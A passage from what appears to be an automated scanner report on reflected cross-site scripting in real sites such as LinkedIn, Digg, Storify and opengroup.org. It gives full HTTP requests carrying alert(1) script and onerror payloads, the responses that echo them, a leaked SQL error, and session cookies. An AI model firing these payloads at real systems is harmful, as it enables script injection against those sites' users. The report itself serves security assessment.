3.112. http://storify.com/klout/contest-winners-how-do-you-use-your-klout-for-good/record/view [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://storify.com
Path:   /klout/contest-winners-how-do-you-use-your-klout-for-good/record/view

Request

GET /klout/contest-winners-how-do-you-use-your-klout-for-good/record/view?callback=jsonp12989872239602281e<script>alert(1)</script>89c1f6018f3 HTTP/1.1
Host: storify.com
Proxy-Connection: keep-alive
Referer: http://klout.com/blog/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _sess=eyJpZCI6ImU5MjY1MTcxYmFmZjE3NGU0Yzc4NGVjY2E3YWQiLCJsYXN0QWNjZXNzIjoxMjk4OTg3MTY5NjUyLCJhdXRoIjp7fX0!56b75e32d6a0f727bda3501f38f5f4f2

Response

HTTP/1.1 200 OK
Content-Type: application/json
Set-Cookie: _sess=eyJpZCI6ImU5MjY1MTcxYmFmZjE3NGU0Yzc4NGVjY2E3YWQiLCJsYXN0QWNjZXNzIjoxMjk4OTg4NzUzNTI2LCJhdXRoIjp7fX0!0dd3f6b28750027994bad4092a66269a; httpOnly; path=/
Content-Length: 77
Date: Tue, 01 Mar 2011 14:12:33 GMT
X-Varnish: 634703140
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

jsonp12989872239602281e<script>alert(1)</script>89c1f6018f3("Recorded view")

3.113. http://REDACTED/CNT/iview/302784236/direct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://REDACTED
Path:   /CNT/iview/302784236/direct

Request

GET /CNT/iview/302784236/direct;wi.125;hi.125/01/773834229?click=http://at.atwola.com/adlink/5113/1838221/0/6/AdId=1473155;BnId=1;itime=773834229;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311143;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=&4debd"><script>alert(1)</script>b38d3c655df=1 HTTP/1.1
Host: REDACTED
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=FA3AE6176FAC4414AD6FC26C726B4B15; AA002=1297806090-11017856; ach00=9cc2/1c4e; ach01=158f3cc/1c4e/2ac3a8d/9cc2/4d6263ca

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Date: Sun, 27 Feb 2011 02:31:24 GMT
Connection: close
Content-Length: 597

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/203665251/302784236/direct;wi.125;hi.125/01" onclick="(new Image).src='http://at.atwola.com/adlink/5113/1838221/0/6/AdId=14731
...[SNIP]...
2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311143;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=&4debd"><script>alert(1)</script>b38d3c655df=1http://t.redcated'">
...[SNIP]...

3.114. http://widgets.digg.com/buttons/count [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Request

GET /buttons/count?url=http%3A//techcrunch.com/classics/12603<script>alert(1)</script>368df4f71e6 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/classics/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Sun, 27 Feb 2011 02:33:09 GMT
Via: NS-CACHE: 100
Etag: "d22d498f927e3a9e446e0238dde9829118d3ff60"
Content-Length: 116
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Sun, 27 Feb 2011 02:43:08 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "http://techcrunch.com/classics/12603<script>alert(1)</script>368df4f71e6", "diggs": 0});

3.115. http://www.business-software.com/top-10-web-content-management-vendors.php [gclid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business-software.com
Path:   /top-10-web-content-management-vendors.php

Request

GET /top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw887e2"><script>alert(1)</script>3846485b49a HTTP/1.1
Host: www.business-software.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:20:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: PHPSESSID=tn6mr2tkpge0hm9j073mo3abd6; path=/
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Content-Length: 32741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
   <meta http-equiv="C
...[SNIP]...
<form method="post" id="RegistrationQForm" action="/top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw887e2"><script>alert(1)</script>3846485b49a">
...[SNIP]...

3.116. http://www.business-software.com/top-10-web-content-management-vendors.php [keyword parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business-software.com
Path:   /top-10-web-content-management-vendors.php

Request

GET /top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system31949"><script>alert(1)</script>6472702855d&gclid=CNHU87X6pqcCFVln5QodaVjCBw HTTP/1.1
Host: www.business-software.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:20:14 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: PHPSESSID=tf092k3rbif117di4fkh2tgt53; path=/
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Content-Length: 32741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
   <meta http-equiv="C
...[SNIP]...
<form method="post" id="RegistrationQForm" action="/top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system31949"><script>alert(1)</script>6472702855d&gclid=CNHU87X6pqcCFVln5QodaVjCBw">
...[SNIP]...

3.117. http://www.business-software.com/top-10-web-content-management-vendors.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business-software.com
Path:   /top-10-web-content-management-vendors.php

Request

GET /top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw&e4664"><script>alert(1)</script>215d5cf1a41=1 HTTP/1.1
Host: www.business-software.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:20:29 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: PHPSESSID=56tm98dg8f04is4dfv793tcde1; path=/
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Content-Length: 32744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
   <meta http-equiv="C
...[SNIP]...
<form method="post" id="RegistrationQForm" action="/top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw&e4664"><script>alert(1)</script>215d5cf1a41=1">
...[SNIP]...

3.118. http://www.business-software.com/top-10-web-content-management-vendors.php [track parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business-software.com
Path:   /top-10-web-content-management-vendors.php

Request

GET /top-10-web-content-management-vendors.php?track=12158831c"><script>alert(1)</script>0aa3cd70274&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw HTTP/1.1
Host: www.business-software.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:19:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: PHPSESSID=cbc0c1flt61g7ei5pts0ddp3v3; path=/
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Content-Length: 32741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
   <meta http-equiv="C
...[SNIP]...
<form method="post" id="RegistrationQForm" action="/top-10-web-content-management-vendors.php?track=12158831c"><script>alert(1)</script>0aa3cd70274&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw">
...[SNIP]...

3.119. http://www.business-software.com/top-10-web-content-management-vendors.php [traffic parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.business-software.com
Path:   /top-10-web-content-management-vendors.php

Request

GET /top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearchc411b"><script>alert(1)</script>5975ff9a4a8&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw HTTP/1.1
Host: www.business-software.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:20:06 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: PHPSESSID=3csq33e05pn8tl46hm7ti7hj44; path=/
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Content-Length: 32741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
   <meta http-equiv="C
...[SNIP]...
<form method="post" id="RegistrationQForm" action="/top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearchc411b"><script>alert(1)</script>5975ff9a4a8&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw">
...[SNIP]...

3.120. http://www.linkedin.com/cws/share-count [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /cws/share-count

Request

GET /cws/share-count?url=http%3A%2F%2Fwww.project-syndicate.org%2Fcommentary%2Fashour1%2FEnglishbf915<img%20src%3da%20onerror%3dalert(1)>77ba82f09ef HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/commentary/ashour1/English
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID="ajax:1083319264699442203"; Version=1; Path=/
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:8qHmbJnGz3ALaeEKNDhv6Mnph3zq5ejKEjY-bzJWaTAdnP_K27P2mp:1298773233:7ca8bc841c7b778fb2296ec1656d588ca5376bc7"; Version=1; Max-Age=1799; Expires=Sun, 27-Feb-2011 02:50:32 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: visit=G; Expires=Fri, 17-Mar-2079 05:34:40 GMT; Path=/
Set-Cookie: bcookie="v=1&b9beeacf-d5b5-4c7b-8122-9094af2abc48"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Fri, 17-Mar-2079 05:34:40 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/javascript;charset=UTF-8
Content-Language: en-US
Date: Sun, 27 Feb 2011 02:20:33 GMT
Content-Length: 151

IN.Tags.Share.handleCount({"count":0,"url":"http://www.project-syndicate.org/commentary/ashour1/Englishbf915<img src=a onerror=alert(1)>77ba82f09ef"});

3.121. http://www.montrealkiosk.com/directory.php [categoryId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.montrealkiosk.com
Path:   /directory.php

Request

GET /directory.php?name=Arts%20&%20Entertainment=3&categoryId=6a82d<a>71b105b97ac HTTP/1.1
Host: www.montrealkiosk.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 01:03:11 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 1324

mysql error: [1054: Unknown column '6a82d' in 'where clause'] in EXECUTE("SELECT parent_category_id FROM category WHERE category_id = 6a82d<a>71b105b97ac ORDER BY name ASC")
<pre align=left> &nbsp; &
...[SNIP]...

3.122. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture71102--><script>alert(1)</script>ab500cf3d8b/togaf8-doc/arch/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:11 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4270

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture71102--><script>alert(1)</script>ab500cf3d8b/togaf8-doc/arch/ -->
...[SNIP]...

3.123. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/

Request

GET /architectureca5d0<script>alert(1)</script>e940eee5ea/togaf8-doc/arch/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:08 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4262

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architectureca5d0<script>alert(1)</script>e940eee5ea/togaf8-doc/arch/<br>
...[SNIP]...

3.124. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/

Request

GET /architecture/togaf8-doc14af3<script>alert(1)</script>b843f19b2cc/arch/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:28 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4264

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc14af3<script>alert(1)</script>b843f19b2cc/arch/<br>
...[SNIP]...

3.125. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture/togaf8-docb5ef6--><script>alert(1)</script>8fb3022b3ea/arch/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:31 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4270

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-docb5ef6--><script>alert(1)</script>8fb3022b3ea/arch/ -->
...[SNIP]...

3.126. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/

Request

GET /architecture/togaf8-doc/arch3d8ea<script>alert(1)</script>c79ebfc2275/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:50 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4264

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc/arch3d8ea<script>alert(1)</script>c79ebfc2275/<br>
...[SNIP]...

3.127. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture/togaf8-doc/archfd8d0--><script>alert(1)</script>e0d16d1920c/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:56 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4270

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doc/archfd8d0--><script>alert(1)</script>e0d16d1920c/ -->
...[SNIP]...

3.128. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Request

GET /architecture5a499<script>alert(1)</script>2eeeb0b90fa/togaf8-doc/arch/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:26 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture5a499<script>alert(1)</script>2eeeb0b90fa/togaf8-doc/arch/banner1.htm<br>
...[SNIP]...

3.129. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 1]

Summary

Severity:   High
